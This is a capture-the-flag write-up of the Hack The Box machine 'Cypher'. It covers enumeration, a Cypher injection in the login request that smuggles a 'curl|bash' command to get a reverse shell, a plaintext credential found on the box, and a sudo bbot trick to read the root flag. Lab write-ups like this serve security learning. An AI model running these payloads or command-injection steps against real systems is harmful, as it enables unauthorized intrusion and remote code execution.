First, I added the new host to my known ones:
sudo echo " cypher.htb" | sudo tee -a /etc/hosts
Then, I performed a Nmap scan:
nmap -sC -T4 -p- cypher.htb > sC.txt
22/tcp open ssh
| ssh-hostkey:
| 256 be:68:db:82:8e:63:32:45:54:46:b7:08:7b:3b:52:b0 (ECDSA)
|_ 256 e5:5b:34:f5:54:43:93:f8:7e:b6:69:4c:ac:d6:3d:23 (ED25519)
80/tcp open http
|_http-title: GRAPH ASM
So I checked its website:
I found a weird comment inside the source code:
I performed some enumeration with dirsearch ๐ and got the /testing
dirsearch -u http://cypher.htb
[09:57:55] 301 - 178B - /testing -> http://cypher.htb/testing/
Thereโs a .jar
inside of it, so Iโll download it and extract its content using Java Decompiler:
There is a file called CustomFunctions.class
where there is a code that performs an http request and returns the status code:
This is a nice hint for use to exploit a Cypher injection. I found this interesting blog from Pentester Land which talks about this and also So I captured the login request and tried to find a cypher injection:
I confirmed the injection :D
So now what I need to do is to call the getUrlStatusCode()
function decompiled from the jar to inject a malicious payload and gain RCE:
{"username":"a' return h.value as a UNION CALL custom.getUrlStatusCode(\"\") YIELD statusCode AS a RETURN a;//","password":"a"}
Got a callback, so now Iโll create a bash reverse shell on my machine, then create a server, upload the shell to the machine using the previous PoC and piping it to bash:
{"username":"a' return h.value as a UNION CALL custom.getUrlStatusCode(\"cypher.htb;curl|bash;#\") YIELD statusCode AS a RETURN a;//","password":"a"}
Got a reverse shell :D
I got a shell as neo4j
so now Iโll try to become user graphasm
. Inside of /home/graphasm
there is a file called bbot_preset.yml
which contains the following credentials: neo4j:cU4btyib.20xtCMCXkBmerhK
I can now login and get user flag
User flag
Privilege Escalation
I made a quick search about bbot and found bbotโs github. Then i made a quick search of where the binary was installed:
which bbot
So then I executed the help of the program and got three interesting flags:
/usr/local/bin/bbot -h
-c [CONFIG ...], --config [CONFIG ...] Custom config options in key=value format: e.g. 'modules.shodan.api_key=1234'
-y, --yes Skip scan confirmation prompt
-d, --debug Enable debugging
--dry-run Abort before executing scan
So combining all I can read root flag:
sudo /usr/local/bin/bbot -cy /root/root.txt -d --dry-run
Root flag
Machine pwned!